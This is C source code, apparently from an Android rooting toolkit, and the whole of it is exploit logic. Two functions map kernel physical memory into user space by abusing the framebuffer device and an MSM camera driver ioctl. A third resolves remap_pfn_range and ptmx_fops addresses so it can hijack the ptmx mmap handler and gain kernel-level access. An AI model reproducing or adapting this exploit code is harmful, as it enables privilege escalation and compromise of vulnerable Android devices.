void * fb_mem_mmap(int *fd) { struct fb_fix_screeninfo info; void *mapped_address; if (!kernel_phys_offset_initialized && !detect_kernel_phys_parameters()) { ALOGI("This machine can not use fb_mem exploit.\n"); return MAP_FAILED; } *fd = open(FB_DEVICE, O_RDWR); if (*fd < 0) { ALOGI("Failed to open " FB_DEVICE " due to %s\n", strerror(errno)); return MAP_FAILED; } if (ioctl(*fd, FBIOGET_FSCREENINFO, (void *)&info) != 0) { ALOGI("Failed to get screen info due to %s\n", strerror(errno)); close(*fd); return MAP_FAILED; } mapped_address = mmap((void *)MAPPED_BASE, (0x100000000 - kernel_phys_address), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, *fd, kernel_phys_address + info.smem_len); return mapped_address; }
void * msm_cameraconfig_mmap(int *fd_video, int *fd_config) { struct msm_mem_map_info args; void *mapped_address; if (!kernel_phys_offset_initialized && !detect_kernel_phys_parameters()) { printf("This machine can not use msm_cameraconfig exploit.\n"); return MAP_FAILED; } *fd_video = open("/dev/video0", O_RDWR); if (*fd_video < 0) { goto error_exit; } *fd_config = open("/dev/msm_camera/config0", O_RDWR); if (*fd_config < 0) { goto error_exit; } args.cookie = kernel_phys_offset; args.length = KERNEL_SIZE; args.mem_type = MSM_MEM_MMAP; if (ioctl(*fd_config, MSM_CAM_IOCTL_SET_MEM_MAP_INFO, &args) < 0) { goto error_exit; } mapped_address = mmap((void *)MAPPED_BASE, KERNEL_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, *fd_config, kernel_phys_offset); if (mapped_address == MAP_FAILED) { goto error_exit; } return mapped_address; error_exit: if (*fd_config >= 0) { close(*fd_config); *fd_config = -1; } if (*fd_video >= 0) { close(*fd_video); *fd_video = -1; } return MAP_FAILED; }
bool run_with_mmap(memory_callback_t callback) { unsigned long int kernel_physical_offset; bool result; if (run_exploit_mmap(callback, &result)) { return result; } setup_remap_pfn_range_address(); if (!remap_pfn_range) { printf("You need to manage to get remap_pfn_range addresses.\n"); return false; } setup_ptmx_fops_mmap_address(); if (!ptmx_fops_mmap_address) { printf("You need to manage to get ptmx_fops addresses.\n"); return false; } kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); if (kernel_physical_offset) { set_kernel_phys_offset(kernel_physical_offset - 0x00008000); } else if (!detect_kernel_phys_parameters()) { printf("You need to manage to get kernel_physical_offset addresses.\n"); return false; } return attempt_exploit(ptmx_fops_mmap_address, (unsigned long int)&ptmx_mmap, 0, run_callback_with_mmap, callback); }